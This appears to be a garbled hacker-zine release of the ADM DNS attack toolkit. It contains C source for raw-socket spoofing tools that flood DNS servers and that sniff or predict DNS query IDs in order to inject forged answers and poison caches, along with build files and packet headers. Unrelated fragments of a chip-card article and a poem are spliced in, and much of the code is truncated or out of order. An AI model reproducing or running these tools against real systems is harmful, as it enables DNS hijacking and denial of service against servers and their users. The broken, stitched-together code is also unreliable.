<++> ADMIDpack/ADMdnsfuckr.c
/* ADM DNS DESTROYER */

void main(int argc, char **argv)
{
    struct dnshdr *dns;
    char *data;
    char buffer2[4000];
    unsigned char namez[255];

    if(argc <2){printf(" usage : %s
    dns = (struct dnshdr *)buffer2;
    data = (char *)(buffer2+12);
    bzero(buffer2,sizeof(buffer2));

    if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
        perror("socket");
        exit(ERROR);
    }
    if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
        perror("setsockopt");
        exit(ERROR);
    }

    printf("ADMdnsFuker %s DNS DESTROYER made by the ADM crew\n",VERSION);
    printf("(c) ADM,Heike vouais tous se ki est as moi est a elle aussi ...\n");
    sleep(1);

    s_ip=host2ip("100.1.2.3");
    d_ip=host2ip(argv[1]);
}
<-->
<++> ADMIDpack/ADMkillDNS.c

void main(int argc, char **argv)
{
    if(argc <5){
        system("/usr/bin/clear");
        printf(" usage : %s
    dns = (struct dnshdr *)buffer2;
    data = (char *)(buffer2+DNSHDRSIZE);
    bzero(buffer2,sizeof(buffer2));

    if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
        perror("socket");
        exit(ERROR);
    }
    if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
        perror("setsockopt");
        exit(ERROR);
    }

    printf("ADMkillDNS %s",VERSION);
    printf("\nouais ben mwa je dedie ca a ma Heike");
    printf("\nREADY FOR ACTION!\n");

    s_ip2=s_ip=host2ip(argv[1]);
    d_ip2=d_ip=host2ip(argv[2]);

    if(argc>5)if(*argv[5]=='A')
    {
        for(loop=0;loop<10;loop++){
            dns->id = 6000+loop;
            dns->qr = 0;
            dns->rd = 1;
            dns->aa = 0;
            dns->quenum = htons(1);
            dns->repnum = htons(0);
            i=makepaketQS(data,argv[3],TYPE_A);
            udp_send(sraw,s_ip,d_ip,1200+loop,53,buffer2,DNSHDRSIZE+i);
    } /* end of DNS flood query */

    /* here is the routine against a DoS */
    if(argc>5)if(*argv[5]=='B')
    {
        s_ip=host2ip("100.1.2.3");
        dns->id = 123;
        dns->rd = 1;
        dns->quenum = htons(1);
        if(argc > 6 )idstart = atoi(argv[6]);
        else
            idstart = IDSTART;
        if(argc > 7 )idstop = atoi(argv[7]);
        else
            idstop = IDSTOP;
        if(argc > 8 ){
            portstart = atoi(argv[8]);
            portstop = atoi(argv[9]);
        } else {
            portstart = PORTSTART;
            portstop = PORTSTOP;
        }
        bzero(buffer2,sizeof(buffer2));
        bzero(namez,sizeof(namez));
        i=0;
        x=0;
        s_ip=s_ip2;
        d_ip=d_ip2;
        printf(" terminated..\n");
}
<-->
<++> ADMIDpack/ADMnOg00d.c
/************************/
/*  ADMnog00d (c) ADM   */
/************************/
/* ADM DNS ID PREDICTOR */
/************************/

void usage()
{
    printf(" ADMnoG00D

void senddnspkt(s,d_ip,wwwname,ip,dns)
int s;
u_long d_ip;
char *wwwname;
char *ip;
struct dnshdr *dns;
{
    struct sockaddr_in sin;
    int i;
    char buffer[1024];
    char *data = (char *)(buffer+DNSHDRSIZE);
    bzero(buffer,sizeof(buffer));
    memcpy(buffer,dns,DNSHDRSIZE);

    if(dns->qr == 0)
    {
        i=makepaketQS(data,wwwname,TYPE_A);
        sin.sin_family = AF_INET;
        sin.sin_port = htons(53);
        sin.sin_addr.s_addr = d_ip;
        sendto(s,buffer,DNSHDRSIZE+i,0,(struct sockaddr *)&sin,LEN);
    }
    else
    {
        i=makepaketAW(data,wwwname,ip,TYPE_A);
        sin.sin_family = AF_INET;
        sin.sin_port = htons(53);
        sin.sin_addr.s_addr = d_ip;
        sendto(s,buffer,DNSHDRSIZE+i,0,(struct sockaddr *)&sin,LEN);
    }
}

void dnsqsnord(s,d_ip,wwwname,ID)
int s;
u_long d_ip;
char *wwwname;
int ID;
{
    struct dnshdr *dns;
    char *data;
    char buffer[1024];
    int i;

    dns = (struct dnshdr *)buffer;
    data = (char *)(buffer+DNSHDRSIZE);
    bzero(buffer,sizeof(buffer));
}

void main(int argc, char **argv)
{
    struct sockaddr_in sinrcp;
    struct dnshdr *dns, *dns_recv;
    char *data, *data2;
    char buffer2[4000];
    char buffer[4000];
    char spoofname[255];
    char spoofip[255];
    char dnstrust[255];
    char bla[255];
    char *alacon;
    unsigned char fakename[255];
    unsigned char namez[255];

    dns_recv = (struct dnshdr *)(buffer);
    data2 = (char *)(buffer+DNSHDRSIZE);
    dns = (struct dnshdr *)buffer2;
    data = (char *)(buffer2+DNSHDRSIZE);

    bzero(buffer2,sizeof(buffer2));
    srand(time(NULL));

    if( (sr=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) == ERROR ){
        perror("socket");
        exit(ERROR);
    }
    if( (fcntl(sr,F_SETFL,O_NONBLOCK)) == ERROR ){
        perror("fcntl");
        exit(ERROR);
    }
    if ((sraw = socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR ){
        perror("socket");
        exit(ERROR);
    }
    if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == ERROR)){
        perror("setsockopt");
        exit(ERROR);
    }

    if(argc < 2) usage();
    if(argc > 9 )DA_ID = loop = atoi(argv[9]);

    if(argc > 6)strcpy(spoofname,argv[6]);
    else{
        printf("enter the name you wanna spoof:");
        scanf("%s",spoofname);
    }
    if(argc > 7)strcpy(bla,argv[7]);
    else{
        printf("enter the ip's of the spoof name:");
        scanf("%s",bla);
    }
    alacon =(char *)inet_ntoa(host2ip(bla));
    strcpy(spoofip,alacon);
    if( argc > 8 ) strcpy(bla,argv[8]);
    else{
        printf("enter the DNS trust of the victim:");
        scanf("%s",bla);
    }
    alacon =(char *)inet_ntoa(host2ip(bla));
    strcpy(dnstrust,alacon);

    printf("ADMnoG00d %s\n",VERSION);
    printf("\033[1mHeike\033[0m ownz Me So g\033[5m\033[36m0\033[0m\033[1m0\033[0md\n");
    sleep(1);
    printf("\nLets Play =)!!\n");

    /* save some param */
    s_ip2 = host2ip(argv[1]);
    d_ip2 = d_ip = host2ip(argv[4]);
    trust = host2ip(argv[2]);
    s_ip = host2ip(UNDASPOOF);

    while(1){
        /* here start the spoof anwser */
        ID = loop;
        for(;loop >= ID-10 ;loop--){
            dns->id = htons(loop);
            dns->qr = 1;
            dns->rd = 1;
            dns->aa = 1;
            dns->quenum = htons(1);
            dns->repnum = htons(1);

        bzero(buffer2,sizeof(buffer2));
        /* RE init some variable */
        bzero(namez,sizeof(namez));
        i=0;
        x=0;

        /* time for test spoof */
        dnsqsnord(sr,d_ip2,fakename,myrand());  /* here we sending question */
                                                /* non recursive ! */
        /* we waiting for awnser ... */
        while(1){
        } /* end of while loop */
    }/* end of proggies */
<-->
<++> ADMIDpack/ADMsnOOfID.c
int ETHHDRSIZE;

void main(argc, argv)
int argc;
char *argv[];
{
struct pcap_pkthdr h;
struct pcap *pcap_d;
struct iphdr *ip;
struct udphdr *udp;
struct dnshdr *dnsrecv, *dnssend;
char *data;
char *data2;
char *buffer;
char namefake[255];
char buffer2[1024];
char ebuf[255];
char spoofname[255];
char spoofip[255];
char bla[255];
char dnstrust[255];
char *alacon;
unsigned long s_ipns;
unsigned long d_ip;

srand( (time(NULL) % random() * random()) );

if(argc <2){
printf("usage : %s
if(strstr(argv[1],"ppp0"))ETHHDRSIZE = 0;
else ETHHDRSIZE = 14;

if(argc>5)type=atoi(argv[5]);
if(argc > 6)strcpy(spoofname,argv[6]);
else{
printf("enter the name you wanna spoof:");
scanf("%s",spoofname);
}
if(argc > 7)strcpy(bla,argv[7]);
else{
printf("enter the ip's of the spoof name:");
scanf("%s",bla);
}
alacon =(char *)inet_ntoa(host2ip(bla));
strcpy(spoofip,alacon);
if(argc > 8)strcpy(bla,argv[8]);
else{
printf("enter the dns trust for the spoof\n");
scanf("%s",bla);
}
alacon =(char *)inet_ntoa(host2ip(bla));
strcpy(dnstrust,alacon);

dnssend = (struct dnshdr *)buffer2;
data2 = (char *)(buffer2+DNSHDRSIZE);
bzero(buffer2,sizeof(buffer2));

if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
perror("socket");
exit(ERROR);
}
if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
perror("setsockopt");
exit(ERROR);
}

printf("ADMsn0ofID.c %s ADM ID sniffer\n",VERSION);
printf("ADMsnO0fID (\033[5m\033[01mc\033[0m) ADM,Heike\n");
sleep(1);

pcap_d = pcap_open_live(argv[1],1024,0,100,ebuf);
s_ipns = host2ip(argv[4]);
d_ip = host2ip(argv[2]);
con = myrand();

/* make the question for get the ID */
sprintf(namefake,"%d%d%d.%s",myrand(),myrand(),myrand(),argv[3]);
dnssend->id = 2600;
dnssend->qr = 0;
dnssend->rd = 1;
dnssend->aa = 0;
dnssend->que_num = htons(1);
dnssend->rep_num = htons(0);
i = makepaketQS(data2,namefake,TYPE_A);
udp_send(sraw, s_ipns, d_ip,2600+con, 53, buffer2, DNSHDRSIZE+i);
printf("Question sended...\n");

while(1)
{
buffer = (u_char *)pcap_next(pcap_d,&h); /* catch the packet */
ip = (struct iphdr *)(buffer+ETHHDRSIZE);
udp = (struct udphdr *)(buffer+ETHHDRSIZE+IPHDRSIZE);
dnsrecv = (struct dnshdr *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE);
data = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE);

if(ip->protocol == IPPROTO_UDP){
printf("[%s:%i ->",inet_ntoa(ip->saddr),ntohs(udp->source));
printf("%s:%i]\n",inet_ntoa(ip->daddr),ntohs(udp->dest));
}
} /* well now we have the ID we cant predict the ID */
}
<-->
<++> ADMIDpack/ADMsniffID.c
int ETHHDRSIZE;

void usage(){
printf("usage : ADMsniffID

void main(int argc, char **argv)
{
if(argc <2)usage();
if(strstr(argv[1],"ppp0"))ETHHDRSIZE = 0;
else ETHHDRSIZE = 14;

strcpy(SPOOFIP,argv[2]);
strcpy(spoofname,argv[3]);
type = atoi(argv[4]);

/* Buffer 'n' tcp/ip stuff */
dnssend = (struct dnshdr *)buffer2;
data2 = (char *)(buffer2+12);
/* bzero(buffer,sizeof(buffer)); */
bzero(bla,sizeof(bla));
bzero(buffer2,sizeof(buffer2));

if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
perror("socket");
exit(ERROR);
}
if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
perror("setsockopt");
exit(ERROR);
}

/* open pcap descriptor */
pcap_d = pcap_open_live(argv[1],sizeof(buffer),0,100,ebuf);

printf("ADMsniffID %s (c) ADMnHeike\n",VERSION);

while(1){
buffer =(u_char *)pcap_next(pcap_d,&h); /* catch the packet */
ip = (struct iphdr *)(buffer+ETHHDRSIZE);
udp = (struct udphdr *)(buffer+ETHHDRSIZE+IPHDRSIZE);
dnsrecv = (struct dnshdr *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE);
data = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE);

if(ip->protocol == 17)
if(udp->dest == htons(53) )
} /* end of while(1) */
} /* The End !! ;) */
<-->
<++> ADMIDpack/Makefile
SHELL = /bin/sh
#
CC = gcc
LIBS = -lpcap
BIN = .
CFLAGS = -I. -L.

ADMkillDNS: ADMkillDNS.c
	$(CC) $(CFLAGS) ADMkillDNS.c $(LIBS) -o $(BIN)/ADMkillDNS

ADMsnOOfID: ADMsnOOfID.c
	$(CC) $(CFLAGS) ADMsnOOfID.c $(LIBS) -o $(BIN)/ADMsnOOfID

ADMsniffID: ADMsniffID.c
	$(CC) $(CFLAGS) ADMsniffID.c $(LIBS) -o $(BIN)/ADMsniffID

ADMdnsfuckr: ADMdnsfuckr.c
	$(CC) $(CFLAGS) ADMdnsfuckr.c $(LIBS) -o $(BIN)/ADMdnsfuckr

ADMnOg00d: ADMnOg00d.c
	$(CC) $(CFLAGS) ADMnOg00d.c $(LIBS) -o $(BIN)/ADMnOg00d

clean:
	rm -f $(BIN)/*.o $(BIN)/ADMsniffID $(BIN)/ADMsnOOfID $(BIN)/ADMnOg00d \
	$(BIN)/ADMkillDNS $(BIN)/ADMdnsfuckr
<-->
<++> ADMIDpack/bpf.h
/*-
 * Copyright (c) 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997
 *	The Regents of the University of California.  All rights reserved.
 *
 * This code is derived from the Stanford/CMU enet packet filter,
 * (net/enet.c) distributed as part of 4.3BSD, and code contributed
 * to Berkeley by Steven McCanne and Van Jacobson both of Lawrence
 * Berkeley Laboratory.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *	This product includes software developed by the University of
 *	California, Berkeley and its contributors.
 * 4. Neither the name of the University nor the names of its contributors
 *    may be used to endorse or promote products derived from this software
 *    without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 *
 *	@(#)bpf.h	7.1 (Berkeley) 5/7/91
 *
 * @(#) $Header: bpf.h,v 1.36 97/06/12 14:29:53 leres Exp $ (LBL)
 */

/* BSD style release date */

typedef	int bpf_int32;
typedef	u_int bpf_u_int32;

/*
 * Alignment macros.  BPF_WORDALIGN rounds up to the next
 * even multiple of BPF_ALIGNMENT.
 */

/*
 * Structure for BIOCSETF.
 */
struct bpf_program {
	u_int bf_len;
	struct bpf_insn *bf_insns;
};

/*
 * Struct returned by BIOCGSTATS.
 */
struct bpf_stat {
	u_int bs_recv;		/* number of packets received */
	u_int bs_drop;		/* number of packets dropped */
};

/*
 * Struct return by BIOCVERSION.  This represents the version number of
 * the filter language described by the instruction encodings below.
 * bpf understands a program iff kernel_major == filter_major &&
 * kernel_minor >= filter_minor, that is, if the value returned by the
 * running kernel has the same major number and a minor number equal
 * to or less than the filter being downloaded.  Otherwise, the
 * results are undefined, meaning an error may be returned or packets
 * may be accepted haphazardly.
 * It has nothing to do with the source code version.
 */
struct bpf_version {
	u_short bv_major;
	u_short bv_minor;
};
/* Current version number of filter architecture. */

/*
 * BPF ioctls
 *
 * The first set is for compatibility with Sun's pcc style
 * header files.  If you're using gcc, we assume that you
 * have run fixincludes so the latter set should work.
 */

/*
 * Structure prepended to each packet.
 */
struct bpf_hdr {
	struct timeval	bh_tstamp;	/* time stamp */
	bpf_u_int32	bh_caplen;	/* length of captured portion */
	bpf_u_int32	bh_datalen;	/* original length of packet */
	u_short		bh_hdrlen;	/* length of bpf header (this struct
					   plus alignment padding) */
};
/*
 * Because the structure above is not a multiple of 4 bytes, some compilers
 * will insist on inserting padding; hence, sizeof(struct bpf_hdr) won't work.
 * Only the kernel needs to know about it; applications use bh_hdrlen.
 */

/*
 * Data-link level type codes.
 */

/*
 * The instruction encodings.
 */
/* instruction classes */
/* ld/ldx fields */
/* alu/jmp fields */
/* ret - BPF_K and BPF_X also apply */
/* misc */

/*
 * The instruction data structure.
 */
struct bpf_insn {
	u_short	code;
	u_char	jt;
	u_char	jf;
	bpf_int32 k;
};

/*
 * Macros for insn array initializers.
 */
extern u_int bpf_filter();
extern void bpf_attach();
extern void bpf_tap();
extern void bpf_mtap();
extern u_int bpf_filter(struct bpf_insn *, u_char *, u_int, u_int);

/*
 * Number of scratch memory words (for BPF_LD|BPF_MEM and BPF_ST).
 */
<-->
<++> ADMIDpack/dns.h
struct dnshdr {
	unsigned short int id;

	unsigned char rd:1;	/* recursion desired */
	unsigned char tc:1;	/* truncated message */
	unsigned char aa:1;	/* authoritative answer */
	unsigned char opcode:4;	/* purpose of message */
	unsigned char qr:1;	/* response flag */

	unsigned char rcode:4;	/* response code */
	unsigned char unused:2;	/* unused bits */
	unsigned char pr:1;	/* primary server required (non standard) */
	unsigned char ra:1;	/* recursion available */

	unsigned short int que_num;
	unsigned short int rep_num;
	unsigned short int numrr;
	unsigned short int numrrsup;
};
<-->
<++> ADMIDpack/ip.h
/* adapted from tcpdump */
#define IPVERSION 4

struct iphdr {
	u_char ihl:4,		/* header length */
	       version:4;	/* version */
	u_char tos;		/* type of service */
	short tot_len;		/* total length */
	u_short id;		/* identification */
	short off;		/* fragment offset field */
	u_char ttl;		/* time to live */
	u_char protocol;	/* protocol */
	u_short check;		/* checksum */
	struct in_addr saddr, daddr;	/* source and dest address */
};
#define IP_MAXPACKET 65535
<-->
<++> ADMIDpack/pcap.h
/*
* Copyright (c) 1993, 1994, 1995, 1996, 1997
* The Regents of the University of California. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* This product includes software developed by the Computer Systems
* Engineering Group at Lawrence Berkeley Laboratory.
* 4. Neither the name of the University nor of the Laboratory may be used
* to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* @(#) $Header: pcap.h,v 1.21 97/10/15 21:59:13 leres Exp $ (LBL)
 */

/*
 * Compatibility for systems that have a bpf.h that
 * predates the bpf typedefs for 64-bit support.
 */
typedef int bpf_int32;
typedef u_int bpf_u_int32;

typedef struct pcap pcap_t;
typedef struct pcap_dumper pcap_dumper_t;

/*
 * The first record in the file contains saved values for some
 * of the flags used in the printout phases of tcpdump.
 * Many fields here are 32 bit ints so compilers won't insert unwanted
 * padding; these files need to be interchangeable across architectures.
 */
struct pcap_file_header {
	bpf_u_int32 magic;
	u_short version_major;
	u_short version_minor;
	bpf_int32 thiszone;	/* gmt to local correction */
	bpf_u_int32 sigfigs;	/* accuracy of timestamps */
	bpf_u_int32 snaplen;	/* max length saved portion of each pkt */
	bpf_u_int32 linktype;	/* data link type (DLT_*) */
};

/*
 * Each packet in the dump file is prepended with this generic header.
 * This gets around the problem of different headers for different
 * packet interfaces.
 */
struct pcap_pkthdr {
	struct timeval ts;	/* time stamp */
	bpf_u_int32 caplen;	/* length of portion present */
	bpf_u_int32 len;	/* length this packet (off wire) */
};

/*
 * As returned by the pcap_stats()
 */
struct pcap_stat {
	u_int ps_recv;		/* number of packets received */
	u_int ps_drop;		/* number of packets dropped */
	u_int ps_ifdrop;	/* drops by interface XXX not yet supported */
};

typedef void (*pcap_handler)(u_char *, const struct pcap_pkthdr *,
			     const u_char *);

char	*pcap_lookupdev(char *);
int	pcap_lookupnet(char *, bpf_u_int32 *, bpf_u_int32 *, char *);
pcap_t	*pcap_open_live(char *, int, int, int, char *);
pcap_t	*pcap_open_offline(const char *, char *);
void	pcap_close(pcap_t *);
int	pcap_loop(pcap_t *, int, pcap_handler, u_char *);
int	pcap_dispatch(pcap_t *, int, pcap_handler, u_char *);
const u_char *pcap_next(pcap_t *, struct pcap_pkthdr *);
int	pcap_stats(pcap_t *, struct pcap_stat *);
int	pcap_setfilter(pcap_t *, struct bpf_program *);
void	pcap_perror(pcap_t *, char *);
char	*pcap_strerror(int);
char	*pcap_geterr(pcap_t *);
int	pcap_compile(pcap_t *, struct bpf_program *, char *, int,
	    bpf_u_int32);
/* XXX */
int	pcap_freecode(pcap_t *, struct bpf_program *);
int	pcap_datalink(pcap_t *);
int	pcap_snapshot(pcap_t *);
int	pcap_is_swapped(pcap_t *);
int	pcap_major_version(pcap_t *);
int	pcap_minor_version(pcap_t *);

/* XXX */
FILE	*pcap_file(pcap_t *);
int	pcap_fileno(pcap_t *);

pcap_dumper_t *pcap_dump_open(pcap_t *, const char *);
void	pcap_dump_close(pcap_dumper_t *);
void	pcap_dump(u_char *, const struct pcap_pkthdr *, const u_char *);

/* XXX this guy lives in the bpf tree */
u_int	bpf_filter(struct bpf_insn *, u_char *, u_int, u_int);
char	*bpf_image(struct bpf_insn *, int);
<-->
<++> ADMIDpack/udp.h
struct udphdr {
	u_short source;	/* source port */
	u_short dest;	/* destination port */
	u_short len;	/* udp length */
	u_short check;	/* udp checksum */
};
<-->

----[ EOF

:----------------------------:
 Siemens Chip Card Technology
        . by Yggdrasil .
:----------------------------:
[Block diagram residue: "Address Counter" -> "Column Decoder" (16 lines); the rest of the figure was not recovered]
[Table fragment from the chip card memory map; column headers were not recovered]

Frame counter   64   352-415   Yes   Yes   [cfg]

0 0   Secret ROM    Yes   No
0 1   R.O.M.        Yes   No
1 0   Secret PROM   U.C.  U.C.
1 1   P.R.O.M.      U.C.  U.C.
This code can be modified provided that the fuse was not fused, while the
error counter value can be modified even if the fuse was fused...

    "I am for ever walking upon these shores,
     betwixt the sand and the foam.
     The high tide will erase my foot-prints,
     and the wind will blow away the foam.
     But the sea and the shore will remain
     For ever."
                        -- Gibran K. Gibran
presents DNS ID Hacking
[DNS header diagram residue: field-width labels "4 bits" and "3 bits (always 0)"; the figure itself was not recovered]

here we put the IP for example (at least in our case)

>> Oct 06 05:18:12 ADM named[1913]: db_free: DB_F_ACTIVE set - ABORT
at this time named daemon is out of order :)
############### Windows ID Vulnerability
################## BIND Vulnerability
####################################################################
#define IPHDRSIZE sizeof(struct iphdr)
#define UDPHDRSIZE sizeof(struct udphdr)
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include "ip.h"
#include "udp.h"
/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
int s;
unsigned long saddr;
unsigned long daddr;
unsigned short sport;
unsigned short dport;
char * datagram;
unsigned datasize;
udp->source = htons(sport);
udp->dest = htons(dport);
udp->len = htons(UDPHDRSIZE+datasize);
udp->check = 0;
memcpy(data,datagram,datasize);
memset(packet,0,IPHDRSIZE);
ip->saddr.s_addr = saddr;
ip->daddr.s_addr = daddr;
ip->version = 4;
ip->ihl = 5;
ip->ttl = 245;
ip->id = random()%5985;
ip->protocol = IPPROTO_UDP;
ip->tot_len = htons(IPHDRSIZE + UDPHDRSIZE + datasize);
ip->check = 0;
ip->check = in_cksum((char *)packet,IPHDRSIZE);
sin.sin_family=AF_INET;
sin.sin_addr.s_addr=daddr;
sin.sin_port=udp->dest;
x=sendto(s, packet, IPHDRSIZE+UDPHDRSIZE+datasize, 0,
(struct sockaddr*)&sin, sizeof(struct sockaddr));
<-->
<++> ADMIDpack/ADMDNS2.c
/***************/
/* DNS include for play with DNS packet (c) ADM */
/****************/
#define ERROR -1
#define DNSHDRSIZE 12
#define TYPE_A 1
#define TYPE_PTR 12
i=strlen(data)+5;
strcpy(data+i,data);
i=i+strlen(data)+1;
*((u_short *) (data+i)) = htons(TYPE_A);
*((u_short *) (data+i+2)) = htons(1);
*((u_long *) (data+i+4)) = 9999999;
*((u_short *) (data+i+8)) = htons(4);
*((u_long *) (data+i+10)) = host2ip(ip);
return(i+14);
}
i=strlen(data)+5;
strcpy((data+i),data);
i=(i+strlen(data)+1);
*((u_short *) (data+i)) = htons(TYPE_PTR);
*((u_short *) (data+i+2)) = htons(1);
*((u_long *) (data+i+4)) = 9999999;
*((u_short *) (data+i+8)) = htons(strlen(tmp)+1);
strcpy((data+i+10),tmp);
return(i+10+strlen(tmp)+1);
}
}
}
dns = (struct dnshdr *)buff;
data = (char *)(buff+DNSHDRSIZE);
trustip = host2ip(dnstrust);
victimip = host2ip(victim);
fakeip = host2ip("12.1.1.0");
/* send question ... */
/* now its time to awnser Quickly !!! */
for(rere = 0; rere < 2;rere++){
for(loop=0;loop < 80;loop++){
printf("trustip %s,vitcimip %s,spoofna %s,spoofip %s,ID %i,type %i\n",
dnstrust,victim,spoofname,spoofip,ID+loop,type);
sendawnser(trustip,victimip,spoofname,spoofip,ID+loop,type);
}
}
}
#define DNSHDRSIZE 12
#define VERSION "0.2 pub"
#define ERROR -1
#include
#include
#include "ADM-spoof.c"
#include "dns.h"
#include "ADMDNS2.c"
unsigned long s_ip;
unsigned long d_ip;
int sraw,on=1;
dns->id = 123;
dns->rd = 1;
dns->que_num = htons(1);
while(1){
sprintf(namez,"\3%d\3%d\3%d\3%d\07in-addr\04arpa",myrand(),myrand(),myrand(),myrand());
printf("%s\n",namez);
strcpy(data,namez);
*( (u_short *) (data+strlen(namez)+1) ) = ntohs(12);
*( (u_short *) (data+strlen(namez)+3) ) = ntohs(1);
udp_send(sraw,s_ip,d_ip,2600+myrand(),53,buffer2,14+strlen(namez)+5);
s_ip=ntohl(s_ip);
s_ip++;
s_ip=htonl(s_ip);
}
#include "ADM-spoof.c"
#include "dns.h"
#include "ADMDNS2.c"
#define ERROR -1
#define VERSION "0.3 pub"
#define ID_START 1
#define ID_STOP 65535
#define PORT_START 53
#define PORT_STOP 54
struct dnshdr *dns;
char *data;
char buffer2[4000];
unsigned char namez[255];
unsigned long s_ip,s_ip2;
unsigned long d_ip,d_ip2;
int sraw, i, on=1, x, loop, idstart, idstop, portstart, portstop;
s_ip=ntohl(s_ip);
s_ip++;
s_ip=htonl(s_ip);
}
printf("plz enter the number of packet u wanna send\n");
scanf("%i",&i);
for(x=0;x<i;x++){
sprintf(namez,"\3%d\3%d\3%d\3%d\07in-addr\04arpa",myrand(),myrand(),myrand(),myrand());
strcpy(data,namez);
*( (u_short *) (data+strlen(namez)+1) ) = ntohs(12);
*( (u_short *) (data+strlen(namez)+3) ) = ntohs(1);
udp_send(sraw,s_ip,d_ip,2600+myrand(),53,buffer2,14+strlen(namez)+5);
s_ip=ntohl(s_ip);
s_ip++;
s_ip=htonl(s_ip);
printf("send packet num %i:%i\n",x,i);
}
} /* end of DNS DOS */
for(;idstart<idstop;idstart++){
dns->id = htons(idstart);
dns->qr = 1;
dns->rd = 1;
dns->aa = 1;
dns->que_num = htons(1);
dns->rep_num = htons(1);
printf("send awnser with id %i to port %i at port %i\n",idstart,portstart,portstop);
i=makepaketAW(data,argv[3],argv[4],TYPE_A);
for(;x < portstop; x++)
udp_send(sraw,s_ip,d_ip,53,x,buffer2,DNSHDRSIZE+i);
x = portstart;
}
#include
#include
#include "dns.h"
#include "ADM-spoof.c"
#include "ADMDNS2.c"
#define VERSION "0.7 pub"
#define SPOOFIP "4.4.4.4"
#define ERROR -1
#define LEN sizeof(struct sockaddr)
#define UNDASPOOF "111.111.111.111"
#define TIMEOUT 300
#define DNSHDRSIZE 12
dns->id = htons(ID);
dns->qr = 0;
dns->rd = 0; /* dont want the recursion !! */
dns->aa = 0;
dns->que_num = htons(1);
dns->rep_num = htons(0);
i=makepaketQS(data,wwwname,TYPE_A);
senddnspkt(s,d_ip,wwwname,NULL,dns);
unsigned long s_ip, s_ip2;
unsigned long d_ip, d_ip2, trust;
unsigned int DA_ID = 65535, loop = 65535;
int sraw, s_r, i, on=1, x, ID,timez;
int len = sizeof(struct sockaddr);
